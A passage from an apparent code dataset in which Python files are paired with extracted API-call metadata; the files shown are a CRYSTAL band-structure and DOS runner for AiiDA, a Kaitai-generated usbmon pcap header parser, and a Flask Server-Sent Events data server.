fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5109, 5160), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'data', '"""vMarker"""'], {}), "(self.vtk_actor, data, 'vMarker')\n", (5127, 5160), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5221, 5275), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vMarker"""'}), "(self.vtk_actor, array_name='vMarker')\n", (5237, 5275), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((5654, 5724), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_color_by_vertex', '"""vEdgeColor"""'], {}), "(self.vtk_actor, edge_color_by_vertex, 'vEdgeColor')\n", (5672, 5724), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((5805, 5862), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeColor"""'}), "(self.vtk_actor, array_name='vEdgeColor')\n", (5821, 5862), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((6215, 6285), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_width_by_vertex', '"""vEdgeWidth"""'], {}), "(self.vtk_actor, edge_width_by_vertex, 'vEdgeWidth')\n", (6233, 6285), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((6366, 6423), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeWidth"""'}), "(self.vtk_actor, array_name='vEdgeWidth')\n", (6382, 6423), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((6775, 6849), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'edge_opacity_by_vertex', '"""vEdgeOpacity"""'], {}), "(self.vtk_actor, edge_opacity_by_vertex, 'vEdgeOpacity')\n", (6793, 6849), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((6932, 6991), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vEdgeOpacity"""'}), "(self.vtk_actor, array_name='vEdgeOpacity')\n", (6948, 6991), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((7351, 7429), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['self.vtk_actor', 'marker_opacity_by_vertex', '"""vMarkerOpacity"""'], {}), "(self.vtk_actor, marker_opacity_by_vertex, 'vMarkerOpacity')\n", (7369, 7429), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((7514, 7575), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""vMarkerOpacity"""'}), "(self.vtk_actor, array_name='vMarkerOpacity')\n", (7530, 7575), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((20329, 20374), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (20338, 20374), True, 'import numpy as np\n'), ((21046, 21091), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (21055, 21091), True, 'import numpy as np\n'), ((21532, 21577), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (21541, 21577), True, 'import numpy as np\n'), ((22054, 22099), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (22063, 22099), True, 'import numpy as np\n'), ((22558, 22603), 'numpy.repeat', 'np.repeat', (['data', 'self._centers_length'], {'axis': '(0)'}), '(data, self._centers_length, axis=0)\n', (22567, 22603), True, 'import numpy as np\n'), ((24428, 24461), 'numpy.zeros', 'np.zeros', (['(self._num_edges, 2, 3)'], {}), '((self._num_edges, 2, 3))\n', (24436, 24461), True, 'import numpy as np\n'), ((28154, 28173), 'fury.utils.update_actor', 'update_actor', (['actor'], {}), '(actor)\n', (28166, 28173), False, 'from fury.utils import update_actor\n'), ((4860, 4912), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""marker"""', 'uniform_type': '"""f"""', 'value': 'data'}), "(name='marker', uniform_type='f', value=data)\n", (4867, 4912), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((5442, 5504), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeColor"""', 'uniform_type': '"""3f"""', 'value': 'edge_color'}), "(name='edgeColor', uniform_type='3f', value=edge_color)\n", (5449, 5504), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((6029, 6090), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeWidth"""', 'uniform_type': '"""f"""', 'value': 'edge_width'}), "(name='edgeWidth', uniform_type='f', value=edge_width)\n", (6036, 6090), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((6591, 6651), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""edgeOpacity"""', 'uniform_type': '"""f"""', 'value': 'opacity'}), "(name='edgeOpacity', uniform_type='f', value=opacity)\n", (6598, 6651), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7163, 7225), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""markerOpacity"""', 'uniform_type': '"""f"""', 'value': 'opacity'}), "(name='markerOpacity', uniform_type='f', value=opacity)\n", (7170, 7225), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7748, 7811), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""specularStrength"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='specularStrength', uniform_type='f', value=value)\n", (7755, 7811), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((7982, 8038), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""shadowMix"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='shadowMix', uniform_type='f', value=value)\n", (7989, 8038), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((8211, 8269), 'helios.backends.fury.tools.Uniform', 'Uniform', ([], {'name': '"""specularMix"""', 'uniform_type': '"""f"""', 'value': 'value'}), "(name='specularMix', uniform_type='f', value=value)\n", (8218, 8269), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((23476, 23526), 'numpy.repeat', 'np.repeat', (['positions', 'self._centers_length'], {'axis': '(0)'}), '(positions, self._centers_length, axis=0)\n', (23485, 23526), True, 'import numpy as np\n'), ((5062, 5080), 'numpy.repeat', 'np.repeat', (['data', '(4)'], {}), '(data, 4)\n', (5071, 5080), True, 'import numpy as np\n'), ((5576, 5608), 'numpy.repeat', 'np.repeat', (['edge_color', '(4)'], {'axis': '(0)'}), '(edge_color, 4, axis=0)\n', (5585, 5608), True, 'import numpy as np\n'), ((6162, 6186), 'numpy.repeat', 'np.repeat', (['edge_width', '(4)'], {}), '(edge_width, 4)\n', (6171, 6186), True, 'import numpy as np\n'), ((6725, 6746), 'numpy.repeat', 'np.repeat', (['opacity', '(4)'], {}), '(opacity, 4)\n', (6734, 6746), True, 'import numpy as np\n'), ((7301, 7322), 'numpy.repeat', 'np.repeat', (['opacity', '(4)'], {}), '(opacity, 4)\n', (7310, 7322), True, 'import numpy as np\n'), ((26934, 26962), 'numpy.zeros', 'np.zeros', (['positions.shape[0]'], {}), '(positions.shape[0])\n', (26942, 26962), True, 'import numpy as np\n'), ((27927, 27955), 'numpy.zeros', 'np.zeros', (['positions.shape[0]'], {}), '(positions.shape[0])\n', (27935, 27955), True, 'import numpy as np\n')] |
"""
This is the module to quickly (re-)run the CRYSTAL properties
locally at the AiiDA master, however outside of the AiiDA graph
NB
ln -s /root/bin/Pproperties /usr/bin/Pproperties
apt-get -y install openmpi-bin
"""
import os
import time
import random
import shutil
import subprocess
from configparser import ConfigParser
import warnings
import string
from datetime import datetime
import numpy as np
from ase.units import Hartree
import psutil
from pyparsing import ParseException
from yascheduler import CONFIG_FILE
from aiida.plugins import DataFactory
from aiida_crystal_dft.io.f9 import Fort9
from aiida_crystal_dft.io.d3 import D3
from aiida_crystal_dft.io.f25 import Fort25
from aiida_crystal_dft.io.f34 import Fort34
from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path
from aiida_crystal_dft.utils.dos import get_dos_projections_atoms
from .common import guess_metal
EXEC_PATH = "/usr/bin/Pproperties"
# EXEC_PATH = "/root/bin/properties" # NB. MAY BE NEEDED AT SOME AIIDA INSTANCES, E.G. AT SCW
EXEC_TIMEOUT = 900 # NB fifteen minutes
exec_cmd = "/usr/bin/mpirun -np 1 --allow-run-as-root -wd %s %s > %s 2>&1"
# exec_cmd = "cd %s && %s < INPUT > %s 2>&1" # NB. MAY BE NEEDED AT SOME AIIDA INSTANCES, E.G. AT SCW
dos_colors = ['green', 'red', 'blue', 'orange', 'purple', 'gray'] # max. quinaries + total
config = ConfigParser()
config.read(CONFIG_FILE)
f34_input = Fort34()
def is_conductor(band_stripes):
ZERO_TOL = 0.01
for s in band_stripes:
top, bottom = max(s), min(s)
if bottom < -ZERO_TOL and top > ZERO_TOL: return True
elif bottom > ZERO_TOL: break
return False
def get_band_gap_info(band_stripes):
"""
Args:
band_stripes: (2d-array) spaghetti in eV
Returns:
(tuple) indirect_gap, direct_gap
"""
for n in range(1, len(band_stripes)):
bottom = np.min(band_stripes[n])
if bottom > 0:
top = np.max(band_stripes[n - 1])
if top < bottom:
direct_gap = np.min(band_stripes[n] - band_stripes[n - 1])
indirect_gap = bottom - top
break
else:
return None, None
else:
raise RuntimeError("Unexpected data in band structure: no bands above zero found!")
if direct_gap <= indirect_gap:
return False, direct_gap
else:
return indirect_gap, direct_gap
def kill(proc_pid):
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
def get_avg_charges(ase_obj):
at_type_chgs = {}
for atom in ase_obj:
at_type_chgs.setdefault(atom.symbol, []).append(atom.charge)
if sum([sum(at_type_chgs[at_type]) for at_type in at_type_chgs]) == 0.0:
return None
return {at_type: np.average(at_type_chgs[at_type]) for at_type in at_type_chgs}
def get_avg_magmoms(ase_obj):
at_type_chgs = {}
for atom in ase_obj:
at_type_chgs.setdefault(atom.symbol, []).append(atom.magmom)
if abs(sum([sum(at_type_chgs[at_type]) for at_type in at_type_chgs])) < 0.05: # TODO
return None
return {at_type: np.average(at_type_chgs[at_type]) for at_type in at_type_chgs}
def properties_run_direct(wf_path, input_dict, work_folder=None, timeout=None):
"""
This procedure runs properties
outside of the AiiDA graph and scheduler,
returns (bands, dos), work_folder, error
"""
assert wf_path.endswith('fort.9') and 'band' in input_dict and 'dos' in input_dict
assert 'first' not in input_dict['dos'] and 'first' not in input_dict['band']
assert 'last' not in input_dict['dos'] and 'last' not in input_dict['band']
if not work_folder:
work_folder = os.path.join(config.get('local', 'data_dir'), '_'.join([
'props',
datetime.now().strftime('%Y%m%d_%H%M%S'),
''.join([random.choice(string.ascii_lowercase) for _ in range(4)])
]))
os.makedirs(work_folder, exist_ok=False)
shutil.copy(wf_path, work_folder)
shutil.copy(os.path.join(os.path.dirname(wf_path), 'fort.34'), work_folder) # save structure
wf = Fort9(os.path.join(work_folder, 'fort.9'))
# automatic generation of k-point path
#structure = wf.get_structure()
last_state = wf.get_ao_number()
# NB fort.9 may produce slightly different structure, so use fort.34
f34 = f34_input.read(os.path.join(os.path.dirname(wf_path), 'fort.34'))
structure = f34.to_aiida()
shrink, _, kpath = get_shrink_kpoints_path(structure)
input_dict['band']['shrink'] = shrink
input_dict['band']['bands'] = kpath
# automatic generation of first and last state
input_dict['band']['first'] = 1
input_dict['band']['last'] = last_state
input_dict['dos']['first'] = 1
input_dict['dos']['last'] = last_state
input_dict['dos']['projections_atoms'] = get_dos_projections_atoms(wf.get_atomic_numbers())
d3_content = str(D3(input_dict))
inp = open(os.path.join(work_folder, 'INPUT'), "w")
inp.write(d3_content)
inp.close()
start_time = time.time()
p = subprocess.Popen(
exec_cmd % (work_folder, EXEC_PATH, os.path.join(work_folder, 'OUTPUT')),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
try:
p.communicate(timeout=timeout or EXEC_TIMEOUT)
except subprocess.TimeoutExpired:
kill(p.pid)
return None, work_folder, 'PROPERTIES killed as too time-consuming'
print("Done in %1.2f sc" % (time.time() - start_time))
if p.returncode != 0:
return None, work_folder, 'PROPERTIES failed'
if not os.path.exists(os.path.join(work_folder, 'BAND.DAT')) \
or not os.path.exists(os.path.join(work_folder, 'DOSS.DAT')) \
or not os.path.exists(os.path.join(work_folder, 'fort.25')):
return None, work_folder, 'PROPERTIES missing outputs'
try:
result = Fort25(os.path.join(work_folder, 'fort.25')).parse()
except AssertionError: # FIXME: how to prevent this
return None, work_folder, 'PANIC: PROPERTIES AssertionError'
except ParseException: # FIXME: how to prevent this
return None, work_folder, 'PANIC: PROPERTIES ParseException'
bands = result.get("BAND", None)
dos = result.get("DOSS", None)
if not bands or not dos:
return None, work_folder, 'PROPERTIES missing BANDS or DOS'
# get rid of the negative DOS artifacts
dos['dos_up'][ dos['dos_up'] < 0 ] = 0
dos['dos_up'] *= Hartree
if dos['dos_down'] is not None:
assert len(dos['dos_up'][0]) == len(dos['dos_down'][0])
dos['dos_down'][ dos['dos_down'] < 0 ] = 0
dos['dos_down'] *= Hartree
# sum up and down: FIXME
dos['dos_up'] += dos['dos_down']
dos['e'] *= Hartree
dos['e_fermi'] *= Hartree
#cell = wf.get_cell(scale=True) # for path construction we're getting geometry from fort.9
# NB fort.9 may produce slightly different structure, so use fort.34
cell = f34.abc, f34.positions, f34.atomic_numbers
path_description = construct_kpoints_path(cell, bands['path'], shrink, bands['n_k'])
# find k-points along the path
k_points = get_explicit_kpoints_path(structure, path_description)['explicit_kpoints']
# pass through the internal AiiDA repr
bands_data = DataFactory('array.bands')()
bands_data.set_kpointsdata(k_points)
if bands['bands_down'] is not None:
# sum up and down: FIXME: how to prevent this
try:
bands_data.set_bands(np.hstack(( (bands['bands_up'] - bands['e_fermi']) * Hartree, (bands['bands_down'] - bands['e_fermi']) * Hartree )))
except ValueError:
return None, work_folder, 'PANIC: cannot sum up and down bands'
else:
bands_data.set_bands((bands['bands_up'] - bands['e_fermi']) * Hartree)
return (bands_data, dos), work_folder, None
def properties_export(bands_data, dos_data, ase_struct):
bands_array = bands_data.get_array('bands')
e_min, e_max = np.amin(bands_array), np.amax(bands_array)
dos_energies = np.linspace(e_min, e_max, num=len(dos_data['dos_up'][0]))
stripes = bands_array.transpose().copy()
if is_conductor(stripes):
indirect_gap, direct_gap = None, None
else:
indirect_gap, direct_gap = get_band_gap_info(stripes)
if (direct_gap and direct_gap > 20) or (indirect_gap and indirect_gap > 20):
return None, '%s: UNPHYSICAL BAND GAP: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap)
if (direct_gap and direct_gap > 15) or (indirect_gap and indirect_gap > 15):
warnings.warn('%s: SUSPICION FOR UNPHYSICAL BAND GAP: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap))
expected_metal = guess_metal(ase_struct)
if expected_metal and (direct_gap or indirect_gap):
warnings.warn('%s: SUSPICION FOR METAL WITH BAND GAPS: %2.2f / %2.2f' % (ase_struct.get_chemical_formula(), direct_gap, indirect_gap))
if not expected_metal and not direct_gap and not indirect_gap:
warnings.warn('%s: SUSPICION FOR NON-METAL WITHOUT BAND GAPS' % ase_struct.get_chemical_formula())
# export only the range of the interest
E_MIN, E_MAX = -10, 20
stripes = stripes[ (stripes[:,0] > E_MIN) & (stripes[:,0] < E_MAX) ]
dos = []
for n, ene in enumerate(dos_energies): # FIXME use numpy advanced slicing
if E_MIN < ene < E_MAX:
dos.append(dos_data['dos_up'][0][n])
dos_energies = dos_energies[ (dos_energies > E_MIN) & (dos_energies < E_MAX) ]
return {
# gaps
'direct_gap': direct_gap,
'indirect_gap': indirect_gap,
# dos values
'dos': np.round(np.array(dos), 3).tolist(),
'levels': np.round(dos_energies, 3).tolist(),
'e_fermi': dos_data['e_fermi'],
# bands values
'k_points': bands_data.get_array('kpoints').tolist(),
'stripes': np.round(stripes, 3).tolist(),
}, None
| [
"configparser.ConfigParser",
"numpy.hstack",
"psutil.Process",
"numpy.array",
"aiida_crystal_dft.utils.kpoints.get_shrink_kpoints_path",
"aiida_crystal_dft.io.d3.D3",
"aiida_crystal_dft.utils.kpoints.get_explicit_kpoints_path",
"numpy.max",
"numpy.min",
"numpy.round",
"random.choice",
"numpy.amin",
"numpy.average",
"aiida_crystal_dft.utils.kpoints.construct_kpoints_path",
"os.path.dirname",
"aiida.plugins.DataFactory",
"shutil.copy",
"time.time",
"os.makedirs",
"os.path.join",
"datetime.datetime.now",
"aiida_crystal_dft.io.f34.Fort34",
"numpy.amax"
] | [((1395, 1409), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (1407, 1409), False, 'from configparser import ConfigParser\n'), ((1448, 1456), 'aiida_crystal_dft.io.f34.Fort34', 'Fort34', ([], {}), '()\n', (1454, 1456), False, 'from aiida_crystal_dft.io.f34 import Fort34\n'), ((2491, 2515), 'psutil.Process', 'psutil.Process', (['proc_pid'], {}), '(proc_pid)\n', (2505, 2515), False, 'import psutil\n'), ((4076, 4109), 'shutil.copy', 'shutil.copy', (['wf_path', 'work_folder'], {}), '(wf_path, work_folder)\n', (4087, 4109), False, 'import shutil\n'), ((4580, 4614), 'aiida_crystal_dft.utils.kpoints.get_shrink_kpoints_path', 'get_shrink_kpoints_path', (['structure'], {}), '(structure)\n', (4603, 4614), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((5157, 5168), 'time.time', 'time.time', ([], {}), '()\n', (5166, 5168), False, 'import time\n'), ((7139, 7204), 'aiida_crystal_dft.utils.kpoints.construct_kpoints_path', 'construct_kpoints_path', (['cell', "bands['path']", 'shrink', "bands['n_k']"], {}), "(cell, bands['path'], shrink, bands['n_k'])\n", (7161, 7204), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((1919, 1942), 'numpy.min', 'np.min', (['band_stripes[n]'], {}), '(band_stripes[n])\n', (1925, 1942), True, 'import numpy as np\n'), ((2873, 2906), 'numpy.average', 'np.average', (['at_type_chgs[at_type]'], {}), '(at_type_chgs[at_type])\n', (2883, 2906), True, 'import numpy as np\n'), ((3216, 3249), 'numpy.average', 'np.average', (['at_type_chgs[at_type]'], {}), '(at_type_chgs[at_type])\n', (3226, 3249), True, 'import numpy as np\n'), ((4030, 4070), 'os.makedirs', 'os.makedirs', (['work_folder'], {'exist_ok': '(False)'}), '(work_folder, exist_ok=False)\n', (4041, 4070), False, 'import os\n'), ((4223, 4258), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.9"""'], {}), "(work_folder, 'fort.9')\n", (4235, 4258), False, 'import os\n'), ((5025, 5039), 'aiida_crystal_dft.io.d3.D3', 'D3', (['input_dict'], {}), '(input_dict)\n', (5027, 5039), False, 'from aiida_crystal_dft.io.d3 import D3\n'), ((5056, 5090), 'os.path.join', 'os.path.join', (['work_folder', '"""INPUT"""'], {}), "(work_folder, 'INPUT')\n", (5068, 5090), False, 'import os\n'), ((7255, 7309), 'aiida_crystal_dft.utils.kpoints.get_explicit_kpoints_path', 'get_explicit_kpoints_path', (['structure', 'path_description'], {}), '(structure, path_description)\n', (7280, 7309), False, 'from aiida_crystal_dft.utils.kpoints import construct_kpoints_path, get_explicit_kpoints_path, get_shrink_kpoints_path\n'), ((7391, 7417), 'aiida.plugins.DataFactory', 'DataFactory', (['"""array.bands"""'], {}), "('array.bands')\n", (7402, 7417), False, 'from aiida.plugins import DataFactory\n'), ((8086, 8106), 'numpy.amin', 'np.amin', (['bands_array'], {}), '(bands_array)\n', (8093, 8106), True, 'import numpy as np\n'), ((8108, 8128), 'numpy.amax', 'np.amax', (['bands_array'], {}), '(bands_array)\n', (8115, 8128), True, 'import numpy as np\n'), ((1984, 2011), 'numpy.max', 'np.max', (['band_stripes[n - 1]'], {}), '(band_stripes[n - 1])\n', (1990, 2011), True, 'import numpy as np\n'), ((4139, 4163), 'os.path.dirname', 'os.path.dirname', (['wf_path'], {}), '(wf_path)\n', (4154, 4163), False, 'import os\n'), ((4487, 4511), 'os.path.dirname', 'os.path.dirname', (['wf_path'], {}), '(wf_path)\n', (4502, 4511), False, 'import os\n'), ((2070, 2115), 'numpy.min', 'np.min', (['(band_stripes[n] - band_stripes[n - 1])'], {}), '(band_stripes[n] - band_stripes[n - 1])\n', (2076, 2115), True, 'import numpy as np\n'), ((5239, 5274), 'os.path.join', 'os.path.join', (['work_folder', '"""OUTPUT"""'], {}), "(work_folder, 'OUTPUT')\n", (5251, 5274), False, 'import os\n'), ((5581, 5592), 'time.time', 'time.time', ([], {}), '()\n', (5590, 5592), False, 'import time\n'), ((5716, 5753), 'os.path.join', 'os.path.join', (['work_folder', '"""BAND.DAT"""'], {}), "(work_folder, 'BAND.DAT')\n", (5728, 5753), False, 'import os\n'), ((5787, 5824), 'os.path.join', 'os.path.join', (['work_folder', '"""DOSS.DAT"""'], {}), "(work_folder, 'DOSS.DAT')\n", (5799, 5824), False, 'import os\n'), ((5858, 5894), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.25"""'], {}), "(work_folder, 'fort.25')\n", (5870, 5894), False, 'import os\n'), ((7601, 7719), 'numpy.hstack', 'np.hstack', (["((bands['bands_up'] - bands['e_fermi']) * Hartree, (bands['bands_down'] -\n bands['e_fermi']) * Hartree)"], {}), "(((bands['bands_up'] - bands['e_fermi']) * Hartree, (bands[\n 'bands_down'] - bands['e_fermi']) * Hartree))\n", (7610, 7719), True, 'import numpy as np\n'), ((5994, 6030), 'os.path.join', 'os.path.join', (['work_folder', '"""fort.25"""'], {}), "(work_folder, 'fort.25')\n", (6006, 6030), False, 'import os\n'), ((9846, 9871), 'numpy.round', 'np.round', (['dos_energies', '(3)'], {}), '(dos_energies, 3)\n', (9854, 9871), True, 'import numpy as np\n'), ((10027, 10047), 'numpy.round', 'np.round', (['stripes', '(3)'], {}), '(stripes, 3)\n', (10035, 10047), True, 'import numpy as np\n'), ((9800, 9813), 'numpy.array', 'np.array', (['dos'], {}), '(dos)\n', (9808, 9813), True, 'import numpy as np\n'), ((3889, 3903), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3901, 3903), False, 'from datetime import datetime\n'), ((3952, 3989), 'random.choice', 'random.choice', (['string.ascii_lowercase'], {}), '(string.ascii_lowercase)\n', (3965, 3989), False, 'import random\n')] |
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
from . import usb_pcap_endpoint_number
class Usbmon(KaitaiStruct):
"""A native pcap header of [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) part of libpcap and Linux kernel.
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L94
.. seealso::
Source - https://www.kernel.org/doc/Documentation/usb/usbmon.txt
.. seealso::
Source - https://www.kernel.org/doc/html/latest/driver-api/usb/URB.html
.. seealso::
Source - https://wiki.wireshark.org/USB
"""
def __init__(self, header_size, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.header_size = header_size
self._read()
def _read(self):
self._raw_header = self._io.read_bytes(self.header_size)
_io__raw_header = KaitaiStream(BytesIO(self._raw_header))
self.header = Usbmon.Header(_io__raw_header, self, self._root)
self.data = self._io.read_bytes(self.header.data_size)
class Timestamp(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.seconds = self._io.read_s8le()
self.microseconds = self._io.read_s4le()
class Header(KaitaiStruct):
class EventType(Enum):
completion = 67
error = 69
submit = 83
class TransferType(Enum):
isochronous = 0
interrupt = 1
control = 2
bulk = 3
class SetupFlag(Enum):
relevant = 0
irrelevant = 45
class DataFlag(Enum):
urb = 0
incoming = 60
outgoing = 62
error = 69
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.urb_id = self._io.read_u8le()
self.event_type = KaitaiStream.resolve_enum(Usbmon.Header.EventType, self._io.read_u1())
self.transfer_type = KaitaiStream.resolve_enum(Usbmon.Header.TransferType, self._io.read_u1())
self.endpoint_number = usb_pcap_endpoint_number.UsbPcapEndpointNumber(self._io)
self.device_address = self._io.read_u1()
self.bus_id = self._io.read_u2le()
self.setup_flag = KaitaiStream.resolve_enum(Usbmon.Header.SetupFlag, self._io.read_u1())
self.data_flag = KaitaiStream.resolve_enum(Usbmon.Header.DataFlag, self._io.read_u1())
self.timestamp = Usbmon.Timestamp(self._io, self, self._root)
self.status = self._io.read_s4le()
self.urb_size = self._io.read_s4le()
self.data_size = self._io.read_s4le()
if self.setup_flag == Usbmon.Header.SetupFlag.relevant:
self.setup = Usbmon.Header.Setup(self._io, self, self._root)
class Setup(KaitaiStruct):
"""
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L118
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.s = self._io.read_bytes(8)
self.interval = self._io.read_s4le()
self.start_frame = self._io.read_s4le()
self.copy_of_urb_transfer_flags = self._io.read_s4le()
self.iso_descriptors_count = self._io.read_s4le()
class PcapUsbSetup(KaitaiStruct):
"""USB setup header as defined in USB specification.
Appears at the front of each Control S-type packet in DLT_USB captures.
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.request_type = self._io.read_u1()
self.request = self._io.read_u1()
self.value = self._io.read_u2le()
self.index = self._io.read_u2le()
self.length = self._io.read_u2le()
class IsoRec(KaitaiStruct):
"""Information from the URB for Isochronous transfers.
.. seealso::
Source - https://github.com/the-tcpdump-group/libpcap/blob/ba0ef0353ed9f9f49a1edcfb49fefaf12dec54de/pcap/usb.h#L70
"""
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.error_count = self._io.read_s4le()
self.descriptors_count = self._io.read_s4le()
| [
"pkg_resources.parse_version",
"kaitaistruct.BytesIO"
] | [((248, 287), 'pkg_resources.parse_version', 'parse_version', (['kaitaistruct.__version__'], {}), '(kaitaistruct.__version__)\n', (261, 287), False, 'from pkg_resources import parse_version\n'), ((290, 310), 'pkg_resources.parse_version', 'parse_version', (['"""0.9"""'], {}), "('0.9')\n", (303, 310), False, 'from pkg_resources import parse_version\n'), ((1429, 1454), 'kaitaistruct.BytesIO', 'BytesIO', (['self._raw_header'], {}), '(self._raw_header)\n', (1436, 1454), False, 'from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO\n')] |
# Copyright (c) 2021, Oracle and/or its affiliates.
# All rights reserved. The Universal Permissive License (UPL), Version 1.0 as shown at http://oss.oracle.com/licenses/upl
import multiprocessing
import os
import sys
import uuid
import flask
# multiprocessing patch
import mp_patch
from datafetch import odatafetch
from log_util import get_logger
from sse import SSE
logger = get_logger(__name__, os.environ.get('LOG_LEVEL'))
mp_patch.apply()
# this line fixes issues with ptvsd debugger
multiprocessing.set_start_method('spawn', True)
# Serve the static content out of the 'static' folder
app = flask.Flask(__name__, static_folder="static")
# Global cache header
@app.after_request
def apply_caching(response):
response.headers["Cache-Control"] = "no-cache"
response.headers["Pragma"] = "no-cache"
return response
# index route
@app.route("/", methods=['GET'])
def static_proxy():
return app.send_static_file("index.html")
# Server Sent Event route, server-push the data to the clients
@app.route("/data", methods=['GET'])
def data_stream():
def stream():
# on connection, subscribe to message queue with uuid
client_id = str(uuid.uuid4())
try:
messages = broadcaster.subscribe(client_id) # returns a multiprocessing.Queue
while True:
# blocks as long as queue is empty
yield messages.get()
finally:
# on disconnect, unsubscribe this client
broadcaster.unsubscribe(client_id)
# serve an 'event-stream', i.e. a long polling request
return flask.Response(stream(), mimetype='text/event-stream')
if __name__ == '__main__':
# define an object manager from multiprocessing,
# as our data fetching code runs on a separate process
mgr = multiprocessing.Manager()
# the clients dict keeps track of connected clients.
clients = mgr.dict()
# initialize the SSE broadcaster
broadcaster = SSE(clients, mgr)
# run the data call as a separate process, pass it the shared client list
thread1 = multiprocessing.Process(target=odatafetch, args=(clients,))
thread1.start()
# run the actual web server
path = os.path.realpath(sys.path[0])
host = os.environ.get("HOST", "127.0.0.1")
app.run(port=8000, host=host, debug=False)
| [
"sse.SSE",
"mp_patch.apply",
"flask.Flask",
"multiprocessing.Process",
"os.environ.get",
"uuid.uuid4",
"os.path.realpath",
"multiprocessing.Manager",
"multiprocessing.set_start_method"
